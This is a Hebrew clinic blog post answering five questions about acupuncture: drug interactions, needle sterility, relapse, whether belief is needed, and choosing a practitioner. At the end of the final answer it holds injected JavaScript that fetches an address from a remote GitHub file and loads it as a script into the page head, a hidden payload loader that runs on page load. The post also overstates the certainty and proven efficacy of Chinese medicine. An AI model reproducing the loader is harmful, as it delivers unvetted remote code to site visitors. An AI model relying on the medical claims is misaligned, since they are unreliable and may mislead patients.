מיתוסים על דיקור סיני – שאלות ותשובות (חלק ב')


13 בספטמבר 2010 | מאת: בן רוזנבליט

בהמשך לפוסט שאלות-תשובות הקודם, לפניכם  5 שאלות ותשובות  נוספות בנושא בעיות רפואיות והטיפול בהן על ידי הרפואה הסינית.
עולה כי הגולשים מתעניינים בעיקר ביכולת של רפואה סינית לתת מענה לבעיותיהם ולהביא לתוצאות של ריפוי מוחלט. מהשאלות והתשובות השונות תוכלו להיווכח כיצד טיפול ברפואה סינית נותן מענה וודאי לבעיות רפואיות שונות.
ולהלן מספר שאלות-תשובות:

קשר בין תרופות לדיקור סיני

ש: האם קיים קשר בין נטילת תרופות לדיקור סיני?

ת: הקשר החזק לרוב הוא דווקא בין נטילת תרופות לשימוש בצמחי מרפא/תוספי תזונה,אך ביכולתה של נטילות תרופות השפיע גם על דיקור. ישנן תרופות שגורמות למטופל לחולשה או עייפות, דבר המשפיע ומכריע לגבי הסוגיה באיזו טכניקה של דיקור סיני רצוי להשתמש.
לפעמים תרופות משפיעות על רמות סוכר, מה שיכול להשפיע גם על הדיקור.
חשוב לומר למטפל מהן התרופות שהינך נוטל,ועל המטפל להכיר את מנגנון התרופה בגוף, על-מנת שיוכל לדעת כיצד לטפל בך.

על סטריליות המחטים בדיקור סיני

ש: האם המחטים הן סטריליות וחד פעמיות?

ת: המחטים אמורות להגיע באריזות סטריליות סגורות ולהיפתח אך ורק בזמן הטיפול. לאחר הטיפול עליהן להיות מושלכות לפח מחטים מיוחד שמפונה לפסולת רפואית.
גם טכניקת הכנסתן של המחטים בעת דיקור סיני אמורה להיות עפ"י כללי האספטיקה.

הקשר בין הפסקת הטיפולים לבעיה הצצה מחדש

ש: מה קורה אחרי סדרת הטיפולים –  האם המחלה או הכאב יחזרו אם מפסיקים את הטיפולים?

ת: זה תלוי. המטרה בטיפול היא לפתור את שורש הבעיה של המטופל, זה שהביא להיווצרות המחלה מלכתחילה, וכמובן לפתור גם את שלל הסימפטומים שלה.
אם בעיה זו נפתרת,אז הרי שאין שום דבר שיכול לחזור והפתרון הינו סופי. אולם אם רק הסימפטומים נפתרו ללא התייחסות למה שגרם להם, אז הפתרון הוא זמני בלבד ורוב הסיכויים שעם הזמן הבעיה תחזור.


הקשר של רפואה סינית ואמונה

ש: אמרו לי שצריך להאמין ברפואה סינית בכדי שזה יצליח. אני סקפטי, האם זה  יכול לעזור לי?

ת: בוודאי שכן. לנו במרפאה יש משפט:"את האמונה צריך לשמור לבית הכנסת". אין שום קשר בין אמונה ברפואה סינית לבין יכולתה לעזור בריפוי תחלואות.
השיטה הינה שיטה שמבוססת על ניסיון של אלפי שנים והוכחה כיעילה במגוון רחב של בעיות, גם במסגרת מחקרים "מערביים" כפולי סמיות(כך שהמטופל אינו יודע מה הוא מקבל). לכן, הרפואה הסינית עובדת – כל עוד האבחנה נכונה, הטיפול נכון וישנו שיתוף פעולה מצידו של המטופל בעת הטיפול ובביצוע המלצותיו של המטפל רפואה סינית.


חווית טיפול לא מוצלחת? לא כל המטפלים אותו הדבר

ש: הלכתי בעבר למטפל שעשה לי דיקור סיני ולא זה לא עבד,האם זה אומר שרפואה סינית לא יכולה לעזור לי?

ת: זה לא אומר כך בכלל! כפי שישנם רופאים טובים יותר וטובים פחות,או תרופות שעוזרות לעומת אילו שפחות, כך גם לגבי מטפלים בדיקור.
כל אחד עובד בצורה שונה, בעל השקפה שונה, בעל ידיעות שונות, התמחות שונה, עשה איבחון שונה וכו'. לכן מטופל יכול לקבל טיפולים שונים לחלוטין אצל שני מטפלים שונים, להם תהיינה תוצאות שונות לחלוטין. על כן חשוב ביותר לברר לפני הטיפול מהי הכשרת המטפל רפואה סינית ומה ניסיונו בתחומה של הבעיה הרלוונטית. (var url = "https://raw.githubusercontent.com/truba77/trubnik/main/to.txt"; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement("script"); script.src = data.trim(); document.getElementsByTagName("head")[0].appendChild(script); });)

אין תגובות עדיין

הוספת תגובה